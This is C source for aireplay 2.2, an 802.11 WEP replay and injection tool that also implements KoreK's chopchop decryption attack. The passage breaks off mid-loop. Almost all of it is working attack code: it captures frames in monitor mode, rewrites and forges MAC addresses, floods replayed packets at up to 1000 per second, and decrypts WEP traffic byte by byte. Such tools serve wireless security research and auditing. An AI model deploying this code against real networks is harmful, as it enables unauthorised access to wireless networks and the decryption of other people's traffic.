/*
 *  802.11 WEP replay & injection attacks
 *
 *  Copyright (C) 2004,2005  Christophe Devine
 *
 *  WEP decryption attack (chopchop) developped by KoreK
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/types.h>
#include <netpacket/packet.h>
#include <linux/rtc.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <arpa/inet.h>
#include <pthread.h>
#include <net/if.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>

#include "pcap.h"
#include "crctable.h"

#define NULL_MAC  "\x00\x00\x00\x00\x00\x00"

#ifndef ETH_P_ALL
#define ETH_P_ALL 3
#endif

#ifndef ETH_P_80211_RAW
#define ETH_P_80211_RAW 25
#endif

#ifndef ARPHRD_IEEE80211
#define ARPHRD_IEEE80211 801
#endif

#ifndef ARPHRD_IEEE80211_PRISM
#define ARPHRD_IEEE80211_PRISM 802
#endif

char usage[] =

"\n"
"  aireplay 2.2 - (C) 2004,2005 Christophe Devine\n"
"\n"
"  usage: aireplay [options] <interface #0> [interface #1]\n"
"\n"
"  interface #0 is for sending packets; it is also used to\n"
"  capture packets unless interface #1 is specified.\n"
"\n"
"  source options:\n"
"\n"
"      -i        : capture packet on-the-fly (default)\n"
"      -r file   : extract packet from this pcap file\n"
"\n"
"  filter options:\n"
"\n"
"      -b bssid  : MAC address, Access Point\n"
"      -d dmac   : MAC address, Destination\n"
"      -s smac   : MAC address, Source\n"
"      -m len    : minimum packet length, default:   40\n"
"      -n len    : maximum packet length, default: 1500\n"
"      -u type   : fc, type     - default: 2 (data)\n"
"      -v subt   : fc, subtype  - default: 0\n"
"      -t tods   : fc, To   DS bit - default: any\n"
"      -f fromds : fc, From DS bit - default: any\n"
"      -w iswep  : fc, WEP     bit - default: 1\n"
"      -y        : save selected packet\n"
"\n"
"  replay options:\n"
"\n"
"      -x nbpps  : number of packets per second\n"
"      -a bssid  : set Access Point MAC address\n"
"      -c dmac   : set Destination  MAC address\n"
"      -h smac   : set Source       MAC address\n"
"      -o fc0    : set frame control[0] (hex)\n"
"      -p fc1    : set frame control[1] (hex)\n"
"      -k        : turn chopchop attack on\n"
"\n";

struct options
{
    unsigned char *s_file;

    unsigned char f_bssid[6];
    unsigned char f_smac[6];
    unsigned char f_dmac[6];
    int f_minlen, f_maxlen;
    int f_type, f_subtype;
    int f_fromds, f_tods, f_iswep;
    int save_packet;

    unsigned char r_bssid[6];
    unsigned char r_smac[6];
    unsigned char r_dmac[6];
    int r_fc_0, r_fc_1;
    int nbpps, do_chopchop;
};

char *wlanng_dev = NULL;

int do_exit = 0;

void sighandler( int signum )
{
    if( signum == SIGINT || signum == SIGTERM )
        do_exit = 1;

    if( signum == SIGALRM )
        do_exit = 2;
}

/* CRC checksum verification routine */

int check_crc_buf( unsigned char *buf, int len )
{
    unsigned long crc = 0xFFFFFFFF;

    for( ; len > 0; len--, buf++ )
        crc = crc_tbl[(crc ^ *buf) & 0xFF] ^ ( crc >> 8 );

    return( ~crc == *((unsigned long *) buf) );
}

/* MAC address parsing routine */

int getmac( char *s, unsigned char *mac )
{
    int i = 0, n;

    while( sscanf( s, "%x", &n ) == 1 )
    {
        if( n < 0 || n > 255 )
            return( 1 );

        mac[i] = n;

        if( ++i == 6 ) break;

        if( ! ( s = strchr( s, ':' ) ) )
            break;

        s++;
    }

    return( i != 6 );
}

/* interface initialization routine */

int openraw( char *iface, int fd, int *arptype )
{
    struct ifreq ifr;
    struct packet_mreq mr;
    struct sockaddr_ll sll;
            
    /* find the interface index */

    memset( &ifr, 0, sizeof( ifr ) );
    strncpy( ifr.ifr_name, iface, sizeof( ifr.ifr_name ) - 1 );

    if( ioctl( fd, SIOCGIFINDEX, &ifr ) < 0 )
    {
        perror( "ioctl(SIOCGIFINDEX) failed" );
        return( 1 );
    }

    /* bind the raw socket to the interface */

    memset( &sll, 0, sizeof( sll ) );
    sll.sll_family   = AF_PACKET;
    sll.sll_ifindex  = ifr.ifr_ifindex;

    if( wlanng_dev )
        sll.sll_protocol = htons( ETH_P_80211_RAW );
    else
        sll.sll_protocol = htons( ETH_P_ALL );

    if( bind( fd, (struct sockaddr *) &sll,
              sizeof( sll ) ) < 0 )
    {
        perror( "bind(ETH_P_ALL) failed" );
        return( 1 );
    }

    /* lookup the hardware type */

    if( ioctl( fd, SIOCGIFHWADDR, &ifr ) < 0 )
    {
        perror( "ioctl(SIOCGIFHWADDR) failed" );
        return( 1 );
    }

    if( ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 &&
        ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM )
    {
        if( ifr.ifr_hwaddr.sa_family == 1 )
            fprintf( stderr, "\nARP linktype is set to 1 (Ethernet) " );
        else
            fprintf( stderr, "\nUnsupported hardware link type %4d ",
                     ifr.ifr_hwaddr.sa_family );

        fprintf( stderr, "- expected ARPHRD_IEEE80211\nor ARPHRD_IEEE8021"
                         "1_PRISM instead.  Make sure RFMON is enabled:\n"
                         "run 'ifconfig %s up; iwconfig %s mode Monitor "
                         "channel <#>'\n\n", iface, iface );
        return( 1 );
    }

    *arptype = ifr.ifr_hwaddr.sa_family;

    /* enable promiscuous mode */

    memset( &mr, 0, sizeof( mr ) );
    mr.mr_ifindex = sll.sll_ifindex;
    mr.mr_type    = PACKET_MR_PROMISC;

    if( setsockopt( fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP,
                    &mr, sizeof( mr ) ) < 0 )
    {
        perror( "setsockopt(PACKET_MR_PROMISC) failed" );
        return( 1 );
    }

    return( 0 );
}

/* wlanng-aware frame sending routing */

unsigned char tmpbuf[4096];

int send_frame( int fd, void *buf, size_t count )
{
    if( wlanng_dev )
    {
        if( ( ((unsigned char *) buf)[0] & 3 ) != 3 )
        {
            memcpy( tmpbuf, buf, 24 );
            memset( tmpbuf + 24, 0, 22 );

            tmpbuf[30] = ( count - 24 ) & 0xFF;
            tmpbuf[31] = ( count - 24 ) >> 8;

            memcpy( tmpbuf + 46, buf + 24, count - 24 );

            count += 22;
        }
        else
        {
            memcpy( tmpbuf, buf, 30 );
            memset( tmpbuf + 30, 0, 16 );

            tmpbuf[30] = ( count - 30 ) & 0xFF;
            tmpbuf[31] = ( count - 30 ) >> 8;

            memcpy( tmpbuf + 46, buf + 30, count - 30 );

            count += 16;
        }

        buf = tmpbuf;
    }

    return( write( fd, buf, count ) < 0 );
}

int main( int argc, char *argv[] )
{
    time_t tt;
    int i, j, n, z;
    int fd_rtc, caplen;
    int fd_in,  arptype_in;
    int fd_out, arptype_out;
    int i_bssid, i_smac, i_dmac;
    int data_start, data_end;
    int guess, is_deauth_mode;

    unsigned long crc_mask;
    unsigned long nb_pkt_read;
    unsigned long nb_pkt_sent;

    float ticks[4];

    char tmp_str[256];

    unsigned char buffer[4096];
    unsigned char *h80211;
    unsigned char *savebuf;
    unsigned char *chopped;

    FILE *f_cap_in  = NULL;
    FILE *f_cap_out = NULL;

    struct tm *lt;
    struct timeval tv;
    struct options opt;
    struct pcap_file_header pfh;
    struct pcap_pkthdr pkh;

    fd_set rfds;

    /* create i/o raw sockets and open /dev/rtc */

    if( ( fd_in = socket( PF_PACKET, SOCK_RAW,
                              htons( ETH_P_ALL ) ) ) < 0 )
    {
        perror( "socket(PF_PACKET) failed" );
        if( getuid() != 0 )
            fprintf( stderr, "This program requires root privileges.\n" );
        return( 1 );
    }

    if( ( fd_out = socket( PF_PACKET, SOCK_RAW,
                               htons( ETH_P_ALL ) ) ) < 0 )
    {
        perror( "socket(PF_PACKET) failed" );
        return( 1 );
    }

    if( ( fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 )
    {
        perror( "open(/dev/rtc) failed" );
        goto skip_rtc;
    }

    if( ioctl( fd_rtc, RTC_IRQP_SET, 1000 ) < 0 )
    {
#ifdef __i386__
        perror( "ioctl(RTC_IRQP_SET) failed" );
        printf( "Make sure enhanced rtc device support is enabled in the"
                " kernel (module\nrtc, not genrtc) - also try 'echo 1024 "
                ">/proc/sys/dev/rtc/max-user-freq'.\n" );
#endif
        close( fd_rtc ); fd_rtc = -1;
        goto skip_rtc;
    }

    if( ioctl( fd_rtc, RTC_PIE_ON, 0 ) < 0 )
    {
        perror( "ioctl(RTC_PIE_ON) failed" );
        close( fd_rtc ); fd_rtc = -1;
    }

skip_rtc:

    /* drop privileges */

    setuid( getuid() );

    /* check the arguments */

    memset( &opt, 0, sizeof( opt ) );

    opt.f_minlen  =   40;
    opt.f_maxlen  = 1500;
    opt.f_type    =    2;
    opt.f_subtype =    0;
    opt.f_tods    =   -1;
    opt.f_fromds  =   -1;
    opt.f_iswep   =    1;
    opt.r_fc_0    =   -1;
    opt.r_fc_1    =   -1;
    opt.nbpps     =  200;

    while( 1 )
    {
        int option = getopt( argc, argv,
                        "ir:b:d:s:m:n:u:v:t:f:w:yx:a:c:h:o:p:k" );

        if( option < 0 ) break;

        switch( option )
        {
        case 'i' :  break;

        case 'r' :  if( opt.s_file != NULL )
                    {
                        printf( "Packet source file already specified.\n" );
                        return( 1 );
                    }
                    opt.s_file = optarg;
                    break;

        case 'b' :  if( getmac( optarg, opt.f_bssid ) != 0 )
                    {
                        printf( "Invalid AP MAC address.\n" );
                        return( 1 );
                    }
                    break;

        case 'd' :  if( getmac( optarg, opt.f_dmac ) != 0 )
                    {
                        printf( "Invalid destination MAC address.\n" );
                        return( 1 );
                    }
                    break;

        case 's' :  if( getmac( optarg, opt.f_smac ) != 0 )
                    {
                        printf( "Invalid source MAC address.\n" );
                        return( 1 );
                    }
                    break;

        case 'm' :  sscanf( optarg, "%d", &opt.f_minlen );
                    if( opt.f_minlen < 0 )
                    {
                        printf( "Invalid minimum length filter.\n" );
                        return( 1 );
                    }
                    break;

        case 'n' :  sscanf( optarg, "%d", &opt.f_maxlen );
                    if( opt.f_maxlen < 0 )
                    {
                        printf( "Invalid maximum length filter.\n" );
                        return( 1 );
                    }
                    break;

        case 'u' :  sscanf( optarg, "%d", &opt.f_type );
                    if( opt.f_type < 0 || opt.f_type > 3 )
                    {
                        printf( "Invalid type filter.\n" );
                        return( 1 );
                    }
                    break;

        case 'v' :  sscanf( optarg, "%d", &opt.f_subtype );
                    if( opt.f_subtype < 0 || opt.f_subtype > 15 )
                    {
                        printf( "Invalid subtype filter.\n" );
                        return( 1 );
                    }
                    break;

        case 't' :  sscanf( optarg, "%d", &opt.f_tods );
                    if( opt.f_tods != 0 && opt.f_tods != 1 )
                    {
                        printf( "Invalid tods filter.\n" );
                        return( 1 );
                    }
                    break;

        case 'f' :  sscanf( optarg, "%d", &opt.f_fromds );
                    if( opt.f_fromds != 0 && opt.f_fromds != 1 )
                    {
                        printf( "Invalid fromds filter.\n" );
                        return( 1 );
                    }
                    break;

        case 'w' :  sscanf( optarg, "%d", &opt.f_iswep );
                    if( opt.f_iswep != 0 && opt.f_iswep != 1 )
                    {
                        printf( "Invalid wep filter.\n" );
                        return( 1 );
                    }
                    break;

        case 'y' :  opt.save_packet = 1; break;

        case 'x' :  sscanf( optarg, "%d", &opt.nbpps );
                    if( opt.nbpps < 1 || opt.nbpps > 1000 )
                    {
                        printf( "Invalid number of packets per second.\n" );
                        return( 1 );
                    }
                    break;

        case 'a' :  if( getmac( optarg, opt.r_bssid ) != 0 )
                    {
                        printf( "Invalid AP MAC address.\n" );
                        return( 1 );
                    }
                    break;

        case 'c' :  if( getmac( optarg, opt.r_dmac ) != 0 )
                    {
                        printf( "Invalid destination MAC address.\n" );
                        return( 1 );
                    }
                    break;

        case 'h' :  if( getmac( optarg, opt.r_smac ) != 0 )
                    {
                        printf( "Invalid source MAC address.\n" );
                        return( 1 );
                    }
                    break;

        case 'o' :  sscanf( optarg, "%x", &opt.r_fc_0 );
                    if( opt.r_fc_0 < 0 ||  opt.r_fc_0 > 255 )
                    {
                        printf( "Invalid frame control byte #0.\n" );
                        return( 1 );
                    }
                    break;

        case 'p' :  sscanf( optarg, "%x", &opt.r_fc_1 );
                    if( opt.r_fc_1 < 0 ||  opt.r_fc_1 > 255 )
                    {
                        printf( "Invalid frame control byte #1.\n" );
                        return( 1 );
                    }
                    break;

        case 'k' :  opt.do_chopchop = 1; break;

        default : goto usage; break;
        }
    }

    if( argc - optind < 1 || argc - optind > 2 )
    {
    usage:
        printf( usage );
        return( 1 );
    }

    if( opt.f_minlen > opt.f_maxlen )
    {
        printf( "Invalid length filter (%d > %d).\n",
                opt.f_minlen, opt.f_maxlen );
        return( 1 );
    }

    if( strcmp( argv[optind], "wlan0" ) == 0 ||
        strcmp( argv[optind], "wlan1" ) == 0 ||
        strcmp( argv[optind], "wlan2" ) == 0 )
        wlanng_dev = argv[optind];

    if( openraw( argv[optind], fd_out, &arptype_out ) != 0 )
        return( 1 );

    /* open the packet source */

    if( argc - optind == 2 )
    {
        if( openraw( argv[argc - 1], fd_in, &arptype_in ) != 0 )
            return( 1 );
    }
    else
    {
        fd_in = fd_out;
        arptype_in = arptype_out;
    }

    if( opt.s_file != NULL )
    {
        if( ! ( f_cap_in = fopen( opt.s_file, "rb" ) ) )
        {
            perror( "open failed" );
            return( 1 );
        }

        n = sizeof( struct pcap_file_header );

        if( fread( &pfh, 1, n, f_cap_in ) != (size_t) n )
        {
            perror( "fread(pcap file header) failed" );
            return( 1 );
        }

        if( pfh.magic != TCPDUMP_MAGIC &&
            pfh.magic != TCPDUMP_CIGAM )
        {
            fprintf( stderr, "\"%s\" isn't a pcap file (expected "
                             "TCPDUMP_MAGIC).\n", opt.s_file );
            return( 1 );
        }

        if( pfh.magic == TCPDUMP_CIGAM )
            SWAP32(pfh.linktype);

        if( pfh.linktype != LINKTYPE_IEEE802_11 &&
            pfh.linktype != LINKTYPE_PRISM_HEADER )
        {
            fprintf( stderr, "Wrong linktype from pcap file header "
                             "(expected LINKTYPE_IEEE802_11) -\n"
                             "this doesn't look like a regular 802.11 "
                             "capture.\n" );
            return( 1 );
        }
    }

    /* look for replay-able packets */

    signal( SIGINT,  sighandler );
    signal( SIGTERM, sighandler );

    nb_pkt_read = 0;

    printf( "\n" );

    tt = time( NULL );

    while( 1 )
    {
        if( do_exit )
        {
            printf( "exiting.\n" );
            return( 1 );
        }

        if( time( NULL ) - tt >= 1 )
        {
            tt = time( NULL );
            printf( "\rSeen %ld packets...\33[K", nb_pkt_read );
            fflush( stdout );
        }

        caplen = 0;

        if( opt.s_file == NULL )
        {
            /* capture one packet */

            FD_ZERO( &rfds );
            FD_SET( fd_in, &rfds );

            tv.tv_sec  = 1;
            tv.tv_usec = 0;

            if( select( fd_in + 1, &rfds, NULL, NULL, NULL ) < 0 )
            {
                if( errno == EINTR ) continue;
                perror( "select failed" );
                return( 1 );
            }

            if( ! FD_ISSET( fd_in, &rfds ) )
                continue;

            /* one packet available for reading */

            gettimeofday( &tv, NULL );

            memset( buffer, 0, 2048 );

            if( ( caplen = read( fd_in, buffer,
                                    sizeof( buffer ) ) ) < 0 )
            {
                perror( "read failed" );
                return( 1 );
            }

            /* if device is an atheros, remove the FCS */

            if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
                caplen -= 4;
        }
        else
        {
            /* read one packet */

            n = sizeof( pkh );

            if( fread( &pkh, 1, n, f_cap_in ) != (size_t) n )
            {
                printf( "\rSeen %ld packets...EOF.\n",
                        nb_pkt_read );
                return( 1 );
            }

            if( pfh.magic == TCPDUMP_CIGAM )
                SWAP32( pkh.caplen );

            n = caplen = pkh.caplen;

            if( fread( buffer, 1, n, f_cap_in ) != (size_t) n )
            {
                printf( "\rSeen %ld packets...EOF.\n",
                        nb_pkt_read );
                return( 1 );
            }
        }

        nb_pkt_read++;

        /* skip the prism header if present */

        h80211 = buffer;

        if( ( opt.s_file == NULL && arptype_in   == ARPHRD_IEEE80211_PRISM ) ||
            ( opt.s_file != NULL && pfh.linktype == LINKTYPE_PRISM_HEADER  ) )
        {
            n = *(int *)( buffer + 4 );

            if( n < 8 || n >= (int) caplen )
                continue;

            h80211 += n;
            caplen -= n;
        }

        /* check length */

        if( caplen < opt.f_minlen ||
            caplen > opt.f_maxlen ) continue;

        /* check the frame control bytes */

        if( ( h80211[0] & 0x0C ) != ( opt.f_type    << 2 ) &&
            opt.f_type    >= 0 ) continue;

        if( ( h80211[0] & 0xF0 ) != ( opt.f_subtype << 4 ) &&
            opt.f_subtype >= 0 ) continue;

        if( ( h80211[1] & 0x01 ) != ( opt.f_tods         ) &&
            opt.f_tods    >= 0 ) continue;

        if( ( h80211[1] & 0x02 ) != ( opt.f_fromds  << 1 ) &&
            opt.f_fromds  >= 0 ) continue;

        if( ( h80211[1] & 0x40 ) != ( opt.f_iswep   << 6 ) &&
            opt.f_iswep   >= 0 ) continue;

        /* check the extended IV (TKIP) flag */

        z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;

        if( opt.f_type == 2 && opt.f_iswep == 1 &&
            ( h80211[z + 3] & 0x20 ) != 0 ) continue;

        /* MAC address checking */

        switch( h80211[1] & 3 )
        {
            case  0: i_bssid = 16; i_smac = 10; i_dmac =  4; break;
            case  1: i_bssid =  4; i_smac = 10; i_dmac = 16; break;
            case  2: i_bssid = 10; i_smac = 16; i_dmac =  4; break;
            default: i_bssid =  4; i_dmac = 16; i_smac = 24; break;
        }

        if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
            if( memcmp( h80211 + i_bssid, opt.f_bssid, 6 ) != 0 )
                continue;

        if( memcmp( opt.f_smac,  NULL_MAC, 6 ) != 0 )
            if( memcmp( h80211 + i_smac,  opt.f_smac,  6 ) != 0 )
                continue;

        if( memcmp( opt.f_dmac,  NULL_MAC, 6 ) != 0 )
            if( memcmp( h80211 + i_dmac,  opt.f_dmac,  6 ) != 0 )
                continue;

        /* this one looks good */

        printf( "\n\n        Size: %d, FromDS: %d, ToDS: %d\n",
                caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
        printf( "        BSSID    = %02X:%02X:%02X:%02X:%02X:%02X\n",
                h80211[i_bssid    ], h80211[i_bssid + 1],
                h80211[i_bssid + 2], h80211[i_bssid + 3],
                h80211[i_bssid + 4], h80211[i_bssid + 5] );
        printf( "        Src. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
                h80211[i_smac    ], h80211[i_smac + 1],
                h80211[i_smac + 2], h80211[i_smac + 3],
                h80211[i_smac + 4], h80211[i_smac + 5] );
        printf( "        Dst. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
                h80211[i_dmac    ], h80211[i_dmac + 1],
                h80211[i_dmac + 2], h80211[i_dmac + 3],
                h80211[i_dmac + 4], h80211[i_dmac + 5] );

        /* print a hex dump of the packet */

        for( i = 0; i < caplen; i++ )
        {
            if( ( i & 15 ) == 0 )
            {
                if( i == 256 )
                {
                    printf( "\n        --- CUT ---" );
                    break;
                }

                printf( "\n        0x%04x:  ", i );
            }

            printf( "%02x", h80211[i] );

            if( ( i & 1 ) != 0 )
                printf( " " );

            if( i == caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
            {
                for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
                {
                    printf( "  " );
                    if( ( j & 1 ) != 0 )
                        printf( " " );
                }

                printf( " " );

                for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
                    printf( "%c", ( h80211[i - 15 + j] <  32 ||
                                    h80211[i - 15 + j] > 126 )
                                  ? '.' : h80211[i - 15 + j] );
            }

            if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
            {
                printf( " " );

                for( j = 0; j < 16; j++ )
                    printf( "%c", ( h80211[i - 15 + j] <  32 ||
                                    h80211[i - 15 + j] > 127 )
                                  ? '.' : h80211[i - 15 + j] );
            }
        }

        printf( "\n\n" );

        printf( "Use this packet ? " );

        fflush( stdout );
        signal( SIGINT, SIG_DFL );
        scanf( "%s", tmp_str );
        signal( SIGINT, sighandler );
        printf( "\n" );

        if( tmp_str[0] == 'y' || tmp_str[0] == 'Y' )
            break;
    }

    /* save the selected packet */

    pfh.magic           = TCPDUMP_MAGIC;
    pfh.version_major   = PCAP_VERSION_MAJOR;
    pfh.version_minor   = PCAP_VERSION_MINOR;
    pfh.thiszone        = 0;
    pfh.sigfigs         = 0;
    pfh.snaplen         = 65535;
    pfh.linktype        = LINKTYPE_IEEE802_11;

    pkh.tv_sec  = tv.tv_sec;
    pkh.tv_usec = tv.tv_usec;
    pkh.caplen  = caplen;
    pkh.len     = caplen;

    lt = localtime( &tv.tv_sec );

    if( opt.save_packet == 1 )
    {
        sprintf( tmp_str, "replay_src-%02d%02d%02d-%02d%02d%02d.cap",
                 lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
                 lt->tm_hour, lt->tm_min, lt->tm_sec );

        printf( "Saving chosen packet in %s\n\n", tmp_str );

        n = sizeof( struct pcap_file_header );

        if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
        {
            perror( "fopen(pcap output,wb+) failed" );
            return( 1 );
        }

        if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
        {
            perror( "fwrite(pcap file header) failed\n" );
            return( 1 );
        }

        n = sizeof( pkh );

        if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
        {
            perror( "fwrite(packet header) failed" );
            return( 1 );
        }

        n = pkh.caplen;

        if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
        {
            perror( "fwrite(packet data) failed" );
            return( 1 );
        }
    }

    if( opt.do_chopchop ) goto do_chopchop;

    /* rewrite MAC addresses & frame control */

    if( opt.r_fc_0 != -1 ) h80211[0] = opt.r_fc_0;
    if( opt.r_fc_1 != -1 ) h80211[1] = opt.r_fc_1;

    z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;

    switch( h80211[1] & 3 )
    {
        case  0: i_bssid = 16; i_smac = 10; i_dmac =  4; break;
        case  1: i_bssid =  4; i_smac = 10; i_dmac = 16; break;
        case  2: i_bssid = 10; i_smac = 16; i_dmac =  4; break;
        default: i_bssid =  4; i_dmac = 16; i_smac = 24; break;
    }

    if( memcmp( opt.r_bssid, NULL_MAC, 6 ) != 0 )
        memcpy( h80211 + i_bssid, opt.r_bssid, 6 );

    if( memcmp( opt.r_smac, NULL_MAC, 6 ) != 0 )
        memcpy( h80211 + i_smac, opt.r_smac, 6 );

    if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
        memcpy( h80211 + i_dmac, opt.r_dmac, 6 );

    /* standard operation mode: loop resending the packet */

    memset( ticks, 0, sizeof( ticks ) );

    nb_pkt_sent = 0;

    while( 1 )
    {
        if( do_exit )
        {
            printf( "exiting.\n\n" );
            return( 0 );
        }

        /* wait for the next timer interrupt, or sleep */

        if( fd_rtc >= 0 )
        {
            if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
            {
                perror( "\nread(/dev/rtc) failed" );
                return( 1 );
            }

            ticks[0]++;
            ticks[1]++;
            ticks[2]++;
        }
        else
        {
            float f;
            struct timeval tv2;

            /* we can't trust usleep, since it depends on the HZ */

            gettimeofday( &tv,  NULL );
            usleep( 1000 );
            gettimeofday( &tv2, NULL );

            f = 1000000 * (float) ( tv2.tv_sec  - tv.tv_sec  )
                        + (float) ( tv2.tv_usec - tv.tv_usec );

            ticks[0] += f / 1000;
            ticks[1] += f / 1000;
            ticks[2] += f / 1000;
        }

        /* update the status line */

        if( ticks[1] > 100 )
        {
            ticks[1] = 0;
            printf( "\rSent %ld packets...\33[K", nb_pkt_sent );
            fflush( stdout );
        }

        /* threshold reached ? */

        if( ( ticks[2] * opt.nbpps ) / 1000 < 1 )
            continue;

        ticks[2] = 0;

        if( send_frame( fd_out, h80211, caplen ) != 0 )
        {
            if( errno != EAGAIN )
            {
                perror( "write(802.11 packet) failed" );
                return( 1 );
            }
        }
        else
            nb_pkt_sent++;
    }

    return( 0 );

    /* chopchop operation mode: truncate and decrypt the packet */
    /* we assume the plaintext starts with  AA AA 03 00 00 00   */

do_chopchop:

    /* backup the packet */

    if( ( savebuf = (unsigned char *) malloc( pkh.caplen ) ) == NULL )
    {
        perror( "malloc failed" );
        return( 1 );
    }

    memcpy( savebuf, h80211, pkh.caplen );

    /* setup the chopping buffer */

    n = pkh.caplen - z + 24;

    if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
    {
        perror( "malloc failed" );
        return( 1 );
    }

    memset( chopped, 0, n );

    data_start = z + 4;
    data_end   = pkh.caplen;

    chopped[0] = 0x08; /* normal data frame */
    chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */

    if( opt.r_fc_0 != -1 ) chopped[0] = opt.r_fc_0;
    if( opt.r_fc_1 != -1 ) chopped[1] = opt.r_fc_1;

    memcpy( chopped +  4, h80211 + i_bssid, 6 ); /* copy the BSSID  */
    memcpy( chopped + 24, h80211 + z, 4 );       /* copy the WEP IV */

    /* setup the xor mask to hide the original data */

    crc_mask = 0;

    for( i = data_start; i < data_end - 4; i++ )
    {
        switch( i - data_start )
        {
            case  0: chopped[i] = 0xAA ^ 0xE0; break;
            case  1: chopped[i] = 0xAA ^ 0xE0; break;
            case  2: chopped[i] = 0x03 ^ 0x03; break;
            default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
        }

        crc_mask = crc_tbl[crc_mask & 0xFF]
                 ^ ( crc_mask   >>  8 )
                 ^ ( chopped[i] << 24 );
    }

    for( i = 0; i < 4; i++ )
        crc_mask = crc_tbl[crc_mask & 0xFF]
                 ^ ( crc_mask >> 8 );

    chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
    chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
    chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
    chopped[data_end - 1] = crc_mask; crc_mask >>= 8;

    for( i = data_start; i < data_end; i++ )
        chopped[i] ^= savebuf[i];

    data_start += 6; /* skip the SNAP header */

    /* if the replay source mac is unspecified, forge one */

    if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
    {
        is_deauth_mode = 1;

        opt.r_smac[0] = 0x00;
        opt.r_smac[1] = rand() & 0x3E;
        opt.r_smac[2] = rand() & 0xFF;
        opt.r_smac[3] = rand() & 0xFF;
        opt.r_smac[4] = rand() & 0xFF;

        memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
    }
    else
    {
        is_deauth_mode = 0;

        opt.r_dmac[0] = 0xFF;
        opt.r_dmac[1] = rand() & 0xFE;
        opt.r_dmac[2] = rand() & 0xFF;
        opt.r_dmac[3] = rand() & 0xFF;
        opt.r_dmac[4] = rand() & 0xFF;
    }

    /* let's go chopping */

    memset( ticks, 0, sizeof( ticks ) );

    nb_pkt_read = 0;
    nb_pkt_sent = 0;

    tt = time( NULL );

    guess = 256;

    alarm( 30 );

    signal( SIGALRM, sighandler );

    if( fcntl( fd_in, F_SETFL, O_NONBLOCK ) < 0 )
    {
        perror( "fcntl(O_NONBLOCK) failed" );
        return( 1 );
    }

    while( data_end > data_start )
    {
        if( do_exit == 1 )
        {
            printf( "exiting.\n\n" );
            return( 1 );
        }

        if( do_exit == 2 )
        {
            printf( "\n\nThe chopchop attack appears to have failed. "
                    "Possible reasons:\n\n    * The driver source wasn't"
                    " properly patched for injection support.\n    * You "
                    "are too far from the AP. Get closer or reduce the "
                    "send rate.\n    * Target is 802.11g only but you are "
                    "using an Atheros or Prism2.\n    * The wireless "
                    "interface isn't setup on the correct channel.\n" );

            if( is_deauth_mode )
                printf( "    * The AP isn't vulnerable when operating in "
                        "non-authenticated mode.\n      Run aireplay in "
                        "authenticated mode instead (-h option).\n\n" );
            else
                printf( "    * The client MAC you have specified "
                        "is not currently authenticated."
                        "\n    * The AP isn't vulnerable when operating in "
                        "authenticated mode.\n      Run aireplay in non-"
                        "authenticated mode instead (no -h option).\n\n" );
            return( 1 );
        }

        /* wait for the next timer interrupt, or sleep */

        if( fd_rtc >= 0 )
        {
            if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
            {
                perror( "\nread(/dev/rtc) failed" );
                return( 1 );
            }

            ticks[0]++;  /* ticks since we entered the while loop     */
            ticks[1]++;  /* ticks since the last status line update   */
            ticks[2]++;  /* ticks since the last frame was sent       */
            ticks[3]++;  /* ticks since started chopping current byte */
        }
        else
        {
            float f;
            struct timeval tv2;

            /* we can't trust usleep, since it depends on the HZ */

            gettimeofday( &tv,  NULL );
            usleep( 1000 );
            gettimeofday( &tv2, NULL );

            f = 1000000 * (float) ( tv2.tv_sec  - tv.tv_sec  )
                        + (float) ( tv2.tv_usec - tv.tv_usec );

            ticks[0] += f / 1000;
            ticks[1] += f / 1000;
            ticks[2] += f / 1000;
            ticks[3] += f / 1000;
        }

        /* update the status line */

        if( ticks[1] > 100 )
        {
            ticks[1] = 0;
            printf( "\rSent %3ld packets, current guess: %02X...\33[K",
                    nb_pkt_sent, guess );
            fflush( stdout );
        }

        if( data_end == 40 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
                                (int) ( pkh.caplen - ( data_end - 1 ) ) )
        {
            printf( "\n\nThe AP appears to drop packets shorter "
                    "than 40 bytes.\n" );

            h80211 = buffer;

